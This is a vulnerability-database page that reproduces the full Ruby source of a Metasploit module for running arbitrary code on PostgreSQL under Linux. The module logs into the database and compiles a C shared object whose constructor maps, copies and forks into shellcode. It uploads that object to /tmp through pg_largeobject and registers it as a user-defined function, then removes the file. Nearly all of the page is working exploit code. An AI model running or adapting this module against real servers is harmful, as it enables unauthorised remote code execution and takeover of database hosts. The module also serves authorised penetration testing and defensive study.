Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PostgreSQL for Linux Payload Execution

🗓️ 18 Dec 2012 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 19 Views

PostgreSQL for Linux Payload Execution module for arbitrary code execution using UDF shared libraries in /tmp directory

Code

                                                ###
# $Id$
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
require 'msf/core/exploit/postgres'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::Postgres
    include Msf::Auxiliary::Report
 
    # Creates an instance of this module.
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'PostgreSQL for Linux Payload Execution',
            'Description'    => %q{
                On some default Linux installations of PostgreSQL, the
                postgres service account may write to the /tmp directory, and
                may source UDF Shared Libraries's from there as well, allowing
                execution of arbitrary code.
 
                This module compiles a Linux shared object file, uploads it to
                the target host via the UPDATE pg_largeobject method of binary
                injection, and creates a UDF (user defined function) from that
                shared object. Because the payload is run as the shared object's
                constructor, it does not need to conform to specific Postgres
                API versions.
            },
            'Author'         =>
            [
                'midnitesnake', # this Metasploit module
                'egypt',        # on-the-fly compiled .so technique
                'todb'          # original windows module this is based on
            ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision$',
            'References'     =>
                [
                    [ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt' ]
                ],
            'Platform'       => 'linux',
            'Payload'        =>
                {
                    'Space'    => 65535,
                    'DisableNops'  => true,
                },
            'Targets'        =>
                [
                    [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
                    [ 'Linux x86_64',    { 'Arch' => ARCH_X86_64 } ],
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Jun 05 2007'
 
            ))
 
        deregister_options('SQL', 'RETURN_ROWSET')
    end
 
    # Buncha stuff to make typing easier.
    def username; datastore['USERNAME']; end
    def password; datastore['PASSWORD']; end
    def database; datastore['DATABASE']; end
    def rhost; datastore['rhost']; end
    def rport; datastore['rport']; end
    def verbose; datastore['VERBOSE']; end
    def bits; datastore['BITS'];end
 
    def execute_command(cmd, opts)
        postgres_sys_exec(cmd)
    end
 
    def exploit
        version = do_login(username,password,database)
        case version
        when :noauth; print_error "Authentication failed."; return
        when :noconn; print_error "Connection failed."; return
        else
            print_status("#{rhost}:#{rport} - #{version}")
        end
 
        fname = "/tmp/#{Rex::Text.rand_text_alpha(8)}.so"
        tbl,fld,so,oid = postgres_upload_binary_data(payload_so(fname), fname)
 
        unless tbl && fld && so && oid
            print_error "Could not upload the UDF SO"
            return
        end
 
        print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})"
        begin
            func_name = Rex::Text.rand_text_alpha(10)
            postgres_query(
                "create or replace function pg_temp.#{func_name}()"+
                " returns void as '#{so}','#{func_name}'"+
                " language 'C' strict immutable"
            )
        rescue
        end
        postgres_logout if @postgres_conn
 
    end
 
 
    # Authenticate to the postgres server.
    #
    # Returns the version from #postgres_fingerprint
    def do_login(user=nil,pass=nil,database=nil)
        begin
            password = pass || postgres_password
            vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}")
            result = postgres_fingerprint(
                :db => database,
                :username => user,
                :password => password
            )
            if result[:auth]
                report_service(
                    :host => rhost,
                    :port => rport,
                    :name => "postgres",
                    :info => result.values.first
                )
                return result[:auth]
            else
                return :noauth
            end
        rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError
            return :noconn
        end
    end
 
 
    def payload_so(filename)
        shellcode = Rex::Text.to_hex(payload.encoded, "\\x")
        #shellcode = "\\xcc"
 
        c = %Q^
            int _exit(int);
            int printf(const char*, ...);
            int perror(const char*);
            void *mmap(int, int, int, int, int, int);
            void *memcpy(void *, const void *, int);
            int mprotect(void *, int, int);
            int fork();
            int unlink(const char *pathname);
 
            #define MAP_PRIVATE 2
            #define MAP_ANONYMOUS 32
            #define PROT_READ 1
            #define PROT_WRITE 2
            #define PROT_EXEC 4
 
            #define PAGESIZE 0x1000
 
            char shellcode[] = "#{shellcode}";
 
            void run_payload(void) __attribute__((constructor));
 
            void run_payload(void)
            {
                int (*fp)();
                fp = mmap(0, PAGESIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
 
                memcpy(fp, shellcode, sizeof(shellcode));
                if (mprotect(fp, PAGESIZE, PROT_READ|PROT_WRITE|PROT_EXEC)) {
                    _exit(1);
                }
                if (!fork()) {
                    fp();
                }
 
                unlink("#{filename}");
                return;
            }
 
        ^
 
        cpu = case target_arch.first
            when ARCH_X86; Metasm::Ia32.new
            when ARCH_X86_64; Metasm::X86_64.new
            end
        payload_so = Metasm::ELF.compile_c(cpu, c, "payload.c")
 
        so_file = payload_so.encode_string(:lib)
 
        so_file
    end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Dec 2012 00:00Current
7.1High risk
Vulners AI Score7.1
postgresqllinuxpayload executionudfshared librariesarbitrary code
19